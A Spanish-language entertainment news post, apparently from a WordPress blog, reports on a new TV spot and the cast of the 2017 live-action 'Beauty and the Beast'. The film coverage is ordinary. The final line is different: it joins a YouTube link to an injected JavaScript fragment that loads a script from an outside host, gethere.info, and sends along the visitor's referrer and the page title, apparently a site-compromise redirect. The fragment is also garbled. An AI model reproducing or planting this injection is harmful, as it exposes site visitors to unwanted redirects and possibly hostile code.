Otro sitio realizado con WordPress

‘La Bella y la Bestia’: El amor entre los protagonistas se deja entrever en el último adelanto

27 0
‘La Bella y la Bestia’: El amor entre los protagonistas se deja entrever en el último adelanto

La Bella y la Bestia, la nueva versión en acción real de la célebre película de animación de Disney, es sin duda una de las películas más esperadas de este 2017. Dirigida por Bill Condon (Dreamgirls, La saga Crepúsculo), la cinta se estrena en España el 17 de marzo y el estudio acaba de difundir un nuevo ‘spot’ en el que podemos ver nuevo material y cómo va surgiendo el amor entre los protagonistas.

En uno de los momentos de este nuevo adelanto, Bella (Emma Watson, Harry Potter) le agradece a Bestia (Dan Stevens, Downton Abbey) que la rescatara de una manada de lobos. Y él, en respuesta -cosa que no sucede en la película original-, le contesta que también está agradecido porque no dejara su cuerpo para que los lobos se lo comieran, comentario que provoca una risa en la joven heroína.

El reparto del filme -una mezcla de actuaciones de carne y hueso y personajes animados digitalmente- lo componen también Luke Evans (Gastón), Ian McKellen (Ding Dong), Emma Thompson (Señora Potts), Stanley Tucci (Cadenza), Ewan McGregor (Lumière), Kevin Kline (Maurice), Gugu Mbatha-Raw (Fifí) y Josh Gad (LeFou). A continuación, no te pierdas ni este último ‘spot’ ni el tráiler oficial del largo.

https://www.youtube.com/watch?v=zNJGXAOacqks.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;